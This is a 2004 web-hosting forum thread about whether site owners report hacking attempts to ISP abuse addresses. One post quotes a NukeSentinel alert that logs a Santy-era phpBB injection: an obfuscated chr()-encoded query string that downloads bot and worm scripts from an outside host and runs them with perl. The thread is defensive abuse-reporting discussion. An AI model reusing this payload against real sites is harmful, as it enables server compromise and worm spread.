Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™
Poll
Do you report hacking attempt to abuse@ email?
Yes
83%
 83%  [ 5 ]
No
0%
 0%  [ 0 ]
What is an abuse@?
16%
 16%  [ 1 ]
Total Votes : 6


Author Message
crypto
Worker
Worker


Joined: Aug 02, 2004
Posts: 165

PostPosted: Sun Dec 26, 2004 1:06 pm Reply with quote

Do you report hacking attempt to abuse@hackers_isp.com if you found out that somebody has tryed to hack or messup with your site?

I don't know that does this help but I'll forward nukesentinel alerts to the abuse@ email address.
 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Sun Dec 26, 2004 2:47 pm Reply with quote

I do if it's US based. I have had reasonably good success with AOL, ComCast, and a few others.
 
View user's profile Send private message
Muffin
Client


Joined: Apr 10, 2004
Posts: 649
Location: UK

PostPosted: Sun Dec 26, 2004 3:54 pm Reply with quote

I hadnt, but I did think it would be a good idea if it could be written into sentinel somehow.

_________________
Classic Mini rules the bends & bends the rules!
[img] 
View user's profile Send private message
Raven
PostPosted: Sun Dec 26, 2004 5:12 pm Reply with quote

Somewhere along the line the user has to take accountability Wink
 
Muffin
PostPosted: Sun Dec 26, 2004 6:07 pm Reply with quote

Yea we cant rely too much on the experts lol

I'll make sure I email abuse in future then hehhee
 
manunkind
Client


Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM

PostPosted: Mon Dec 27, 2004 10:07 am Reply with quote

I've never did it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far.
 
View user's profile Send private message Visit poster's website
Viper-
New Member
New Member


Joined: Dec 24, 2004
Posts: 5

PostPosted: Mon Dec 27, 2004 10:43 pm Reply with quote

manunkind wrote:
I've never did it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far.

Would you mind sharing some of the responses you've gotten so far and which ISP that responded?

I wouldn't mind having a list of some sorts of ISP's that really do take abuse serious and will actually respond.

Before I implemented Raven's quick fix, I had received over 500 e-mails from Sentinel banning IP's in less than 24 hours. Something like that would be hard to e-mail the various IP owners, but it's something I would do over a period of a week or so.

Thanks,

Viper

_________________
Only registered users can see links on this board! Get registered or login! Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

PostPosted: Mon Dec 27, 2004 11:03 pm Reply with quote

heres 1 i sent with the info and the reply to what i sent....
*EDITED FOR MY SECURITY* Wink ha ha

Merry Christmas.

Thanks for your feedback. The server in question is owned and managed
by one of our customers. He has had an intruder on the machine or been
attacked by a worm. He has fixed the problem now.


Dag Řien
Domeneshop AS



Pĺ 25. des 2004 kl. 03:29 skrev <me@mysite.org>:

> From Only registered users can see links on this board! Get registered or login! Fri Dec 24 17:59:16 2004
>
> X-Apparently-To:
> Only registered users can see links on this board! Get registered or login! via XXX.XXX.XXX.XXX; Fri, 24 Dec 2004
> 17:58:19 -0800
>
> Authentication-Results:
> XXXXXX.mail.XXX.yahoo.com from=mysite.com;
> domainkeys=neutral (no sig)
>
> X-Originating-IP:
> [XX.XXX.XXX.XXX]
>
> Return-Path:
> <root@hostXX.myhost.com>
>
> Received:
> from XXX.XXX.XXX.XXX (HELO hostXX.myhost.com) (XX.XX.XXX.XXX) by
> mta328.mail.scd.yahoo.com with SMTP; Fri, 24 Dec 2004 17:58:18 -0800
>
> Received:
> (mail XXXX invoked by uid XXXX); 25 Dec 2004 01:59:16 -0000
>
> Delivered-To:
> Only registered users can see links on this board! Get registered or login!
>
> Received:
> (mail XXXX invoked by uid XX); 25 Dec 2004 01:59:16 -0000
>
> Date:
> 25 Dec 2004 01:59:16 -0000
>
> Message-ID:
> <XXXXXXXXXX.myhost.com>
>
> To:
> Only registered users can see links on this board! Get registered or login!
>
> Subject:
> Blocked on My site.com
>
> From:
>
>
> X-Mailer:
> NukeSentinel™
>
> Content-Length:
> 797
> Date & Time: 2004-12-24 17:59:15
> Blocked IP: 194.63.250.67
> User ID: (1)
> Reason: Abuse-Script
> --------------------
> User Agent: lwp-trivial/1.41
> Query String:
> Only registered users can see links on this board! Get registered or login!
> name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)
> %252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr
> (119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%2
> 52echr(119)%252echr(119)%252echr(46)%252echr(119)%252echr(101)%252echr(
> 9Cool%252echr(109)%252echr(97)%252echr(115)%252echr(116)%252echr(101)%252
> echr(114)%252echr(45)%252echr(105)%252echr(116)%252echr(46)%252echr(105
> )%252echr(116)%252echr(47)%252echr(116)%252echr(101)%252echr(114)%252ec
> hr(114)%252echr(111)%252echr(114)%252echr(9Cool%252echr(111)%252echr(116)
> %252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr
> (112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(116)%2
> 52echr(101)%252echr(114)%252echr(114)%252echr(111)%252echr(114)%252echr
> (9Cool%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%25
> 2echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(1
> 16)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252e
> chr(119)%252echr(101)%252echr(9Cool%252echr(109)%252echr(97)%252echr(115)
> %252echr(116)%252echr(101)%252echr(114)%252echr(45)%252echr(105)%252ech
> r(116)%252echr(46)%252echr(105)%252echr(116)%252echr(47)%252echr(116)%2
> 52echr(101)%252echr(114)%252echr(114)%252echr(111)%252echr(114)%252echr
> (119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%2
> 52echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(
> 114)%252echr(108)%252echr(32)%252echr(116)%252echr(101)%252echr(114)%25
> 2echr(114)%252echr(111)%252echr(114)%252echr(119)%252echr(111)%252echr(
> 114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%2
> 52e%2527
> Forwarded For: none
> Client IP: none
> Remote Address: 194.63.250.67
> Remote Port: 53540
> Request Method: GET
> --------------------
> DNSStuffDNSStuffSorry, you have triggered our rate limiting system.
> Please try again later. If you are reading this in a web browser, we
> apologize -- we want you to use the site as much as you like. What we
> do
> not like is when people use automated programs with our free service.
> We have the addresses Only registered users can see links on this board! Get registered or login! and Only registered users can see links on this board! Get registered or login! here in case
> spammers are harvesting addresses from our site. If you are not
> automatically removed within a few minutes, you can contact us (using
> our info@
> address at the domain in the URL you are at; please refer to 43ddeb42)
> to
> get access again more quickly. Thanks!
>
>
> WHOIS results for 194.63.250.67
>
> Generated by Only registered users can see links on this board! Get registered or login!
> Country: EU
>
> ARIN says that this IP belongs to RIPE; I'm looking it up there.
>
>
> Using 0 day old cached answer (or, you can get fresh results).
> Hiding E-mail address (you can get results with the E-mail address).
>
> % This is the RIPE Whois query server #2.
> % The objects are in RPSL format.
> %
> % Rights restricted by copyright.
> % See Only registered users can see links on this board! Get registered or login!
>
> inetnum: 194.63.248.0 - 194.63.255.255
> netname: NO-HYPNOTECH
> descr: Hypnotech AS
> descr: Local ISP
> country: NO
> admin-c: HH2777-RIPE
> tech-c: HH2777-RIPE
> status: ASSIGNED PI
> notify: ***********@hypnotech.com
> notify: ****@global-ip.net
> mnt-by: RIPE-NCC-HM-PI-MNT
> mnt-by: GLOBALONE-MNT
> changed: **********@ripe.net 19991109
> source: RIPE
>
> route: 194.63.248.0/21
> descr: DOMENESHOP
> origin: AS12996
> notify: **********@domeneshop.no
> mnt-by: AS12996-MNT
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
> role: Domeneshop Hostmaster
> address: Domeneshop AS
> address: Nedre vaskegang 6
> address: NO-0186 Oslo
> address: Norway
> phone: +47 22 94 33 33
> fax-no: +47 22 94 33 34
> e-mail: **********@domeneshop.no
> admin-c: SS784
> tech-c: SS784
> nic-hdl: HH2777-RIPE
> notify: **********@domeneshop.no
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
>
>
 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©